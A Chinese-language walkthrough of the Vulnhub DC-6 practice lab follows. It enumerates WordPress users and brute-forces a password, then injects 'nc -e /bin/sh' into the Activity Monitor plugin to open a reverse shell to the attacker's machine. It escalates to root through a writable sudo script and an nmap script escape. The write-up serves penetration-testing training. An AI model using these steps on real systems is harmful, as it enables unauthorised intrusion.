Vulnhub靶機(jī)入門系列DC:6

DC-6

題目描述

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn't an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:
192.168.0.142 wordy

Clue
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

描述中說到和之前一樣只有一個(gè)Flag，并且需要配置一下HOSTS扒磁，且給了提示

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

知識點(diǎn)總結(jié)

? ①掃描

? ②使用wpscan工具枚舉用戶，結(jié)合提示生成字典進(jìn)行爆破密碼

? ③利用網(wǎng)站插件的命令執(zhí)行漏洞反彈shell

? ④根據(jù)每個(gè)用戶可以執(zhí)行的操作進(jìn)行提權(quán)

? ⑤nmap提權(quán)

1.掃描局域網(wǎng)主機(jī)

arp-scan -l

image

目標(biāo)IP為：192.168.2.132

2.掃描端口

nmap -sV -p- 192.168.2.132

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))

可以看到開放了ssh端口和web端口

3.配置hosts

題目描述已經(jīng)說了，我們需要配置一下hosts文件

Windows下在 C:\windows\system32\drivers\etc\hosts

打開后在末尾添加

192.168.2.132  wordy

Linux下在/etc/hosts

vim /etc/hosts
添加  192.168.2.132  wordy

4.訪問web

image

是一個(gè)WordPress網(wǎng)站愧杯，kali有專門的掃描工具wpscan晾咪，我們可以使用工具掃描一下

在掃描之前先來掃一下目錄

5.使用dirsearch掃描目錄

image

發(fā)現(xiàn)的登錄地址

6.使用wpscan掃描用戶

wpscan --url http://wordy/  -e u

image

發(fā)現(xiàn)了這幾個(gè)用戶收擦，我們將用戶保存到dc6-username.txt中

admin,mark,graham,sarah,jens

image

7.對用戶密碼進(jìn)行爆破

我們使用cewl來生成字典

cewl -w /root/dc6-passwd.txt http://wordy/

開始爆破

wpscan --url http://wordy/ -U dc6-username.txt -P dc6-passwd.txt

image

但是這里顯示沒有找到密碼，于是我們想到剛開始的時(shí)候提示有密碼

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

將rockyou.txt里面的帶有k01的面找出來

我們先查看一下rockyou.txt

image

這里確實(shí)有這個(gè)字典谍倦，將帶有k01的密碼導(dǎo)出來

image

然后進(jìn)行爆破

wpscan --url http://wordy/ -U dc6-username.txt -P dc6-passwd.txt

image

找到了mark的密碼為：helpdesk01

登錄后臺發(fā)現(xiàn)有一個(gè)插件

image

也可以通過wpscan掃描插件

wpscan --url http://wordy --plugins-detection aggressive

image

8.利用插件漏洞來getshell

首先百度查一下activity-monitor漏洞

image

可以看到有命令執(zhí)行漏洞

我們用kali的searchsploit來查找漏洞

searchsploit activity monitor

image

#將html文件復(fù)制到root目錄
cp /usr/share/exploitdb/exploits/php/webapps/45274.html  45274.html
#拷貝一份
cp 45274.html 45274.html.bak
#修改一下html內(nèi)容塞赂，將反彈ip改成kali的，提交申請改為目標(biāo)網(wǎng)站
vi 45274.html

image

然后直接打開網(wǎng)頁提交昼蛀，這里不知道為什么獲取不到shell宴猾，研究一下exp然后去網(wǎng)頁上自己實(shí)現(xiàn)

這里是在activity的插件頁面的tools分類里邊

image

填I(lǐng)P的地方有個(gè)命令執(zhí)行，我們測試一下

image

（這里因?yàn)樘領(lǐng)P的地方對長度有限制所以前邊的127.0.0.1刪掉了一部分）

image

可以看到whoami的命令已經(jīng)被執(zhí)行叼旋，我們在這里反彈一個(gè)shell仇哆，但是我們的shell長度有點(diǎn)長，使用F12修改輸入的長度

image

然后在kali上監(jiān)聽

#kali
nc -lvp 1234
#發(fā)送payload
1|nc -e /bin/sh 192.168.2.135 1234

可以看到已經(jīng)獲取shell了

image

同樣夫植，切換一下shell外殼

python -c 'import pty;pty.spawn("/bin/bash")'

image

先看看這里都有什么文件讹剔，進(jìn)入到home目錄下當(dāng)前用戶的文件夾

image

發(fā)現(xiàn)一個(gè)txt

image

發(fā)現(xiàn)了graham的密碼

graham - GSo7isUM1D4

切換到這個(gè)用戶

image

先查看一下有沒有suid提權(quán) 發(fā)現(xiàn)沒有再使用sudo -l看一下可以執(zhí)行的命令

image

可以使用jens用戶來執(zhí)行這個(gè).sh文件
查看一下這個(gè)腳本是什么內(nèi)容

image

既然我們可以執(zhí)行這個(gè)腳本，我們把/bin/bash放入腳本里详民，以jens用戶執(zhí)行后就相當(dāng)于獲取了jens的權(quán)限

echo "/bin/bash" >> backups.sh

image

已經(jīng)寫進(jìn)去了

然后以jens用戶執(zhí)行

sudo -u jens ./backups.sh

image

已經(jīng)切換到j(luò)ens用戶

再使用sudo -l 查看一下可以執(zhí)行的操作

image

可以使用nmap延欠，由于nmap是可以執(zhí)行腳本的，我們把root的shell放入腳本里讓nmap執(zhí)行也就相當(dāng)于獲取了root的權(quán)限

#寫入shell
echo 'os.execute("/bin/sh")' > Shell
#name使用script執(zhí)行腳本
sudo  nmap  --script=shell

image

獲取root權(quán)限沈跨，查看flag

image

最后編輯于：2020.11.27 00:54:04

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末由捎，一起剝皮案震驚了整個(gè)濱河市，隨后出現(xiàn)的幾起案子饿凛，更是在濱河造成了極大的恐慌狞玛，老刑警劉巖，帶你破解...
沈念sama閱讀 206,214評論 6贊 481
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件笤喳，死亡現(xiàn)場離奇詭異为居，居然都是意外死亡，警方通過查閱死者的電腦和手機(jī)杀狡，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 88,307評論 2贊 382
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門蒙畴，熙熙樓的掌柜王于貴愁眉苦臉地迎上來，“玉大人，你說我怎么就攤上這事膳凝”。” “怎么了？”我有些...
開封第一講書人閱讀 152,543評論 0贊 341
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵蹬音，是天一觀的道長上煤。經(jīng)常有香客問我，道長著淆，這世上最難降的妖魔是什么劫狠？我笑而不...
開封第一講書人閱讀 55,221評論 1贊 279
?港島之戀（遺憾婚禮）
正文為了忘掉前任，我火速辦了婚禮永部，結(jié)果婚禮上独泞，老公的妹妹穿的比我還像新娘。我一直安慰自己苔埋，他們只是感情好懦砂，可當(dāng)我...
茶點(diǎn)故事閱讀 64,224評論 5贊 371
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布。她就那樣靜靜地躺著组橄，像睡著了一般荞膘。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上玉工，一...
開封第一講書人閱讀 49,007評論 1贊 284
城市分裂傳說
那天羽资，我揣著相機(jī)與錄音，去河邊找鬼瓮栗。笑死削罩，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的费奸。我是一名探鬼主播弥激，決...
沈念sama閱讀 38,313評論 3贊 399
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼，長吁一口氣：“原來是場噩夢啊……” “哼愿阐！你這毒婦竟也來了微服？” 一聲冷哼從身側(cè)響起，我...
開封第一講書人閱讀 36,956評論 0贊 259
萬榮殺人案實(shí)錄
序言：老撾萬榮一對情侶失蹤缨历，失蹤者是張志新（化名）和其女友劉穎以蕴，沒想到半個(gè)月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體辛孵，經(jīng)...
沈念sama閱讀 43,441評論 1贊 300
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡丛肮，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 35,925評論 2贊 323
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了魄缚。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片宝与。...
茶點(diǎn)故事閱讀 38,018評論 1贊 333
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡焚廊，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出习劫，到底是詐尸還是另有隱情咆瘟，我是刑警寧澤，帶...
沈念sama閱讀 33,685評論 4贊 322
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布诽里，位于F島的核電站袒餐，受9級特大地震影響，放射性物質(zhì)發(fā)生泄漏谤狡。R本人自食惡果不足惜灸眼，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 39,234評論 3贊 307
男人毒藥：我在死后第九天來索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望豌汇。院中可真熱鬧幢炸，春花似錦泄隔、人聲如沸拒贱。這莊子的主人今日做“春日...
開封第一講書人閱讀 30,240評論 0贊 19
一樁弒父案佛嬉，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽逻澳。三九已至，卻和暖如春暖呕，著一層夾襖步出監(jiān)牢的瞬間斜做，已是汗流浹背。一陣腳步聲響...
開封第一講書人閱讀 31,464評論 1贊 261
情欲美人皮
我被黑心中介騙來泰國打工湾揽，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留瓤逼，地道東北人。一個(gè)月前我還...
沈念sama閱讀 45,467評論 2贊 352
代替公主和親
正文我出身青樓库物，卻偏偏與公主長得像霸旗，于是被迫代替她去往敵國和親。傳聞我的和親對象是個(gè)殘疾皇子戚揭，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 42,762評論 2贊 345

Vulnhub靶機(jī)入門系列DC:6

DC-6

推薦閱讀更多精彩內(nèi)容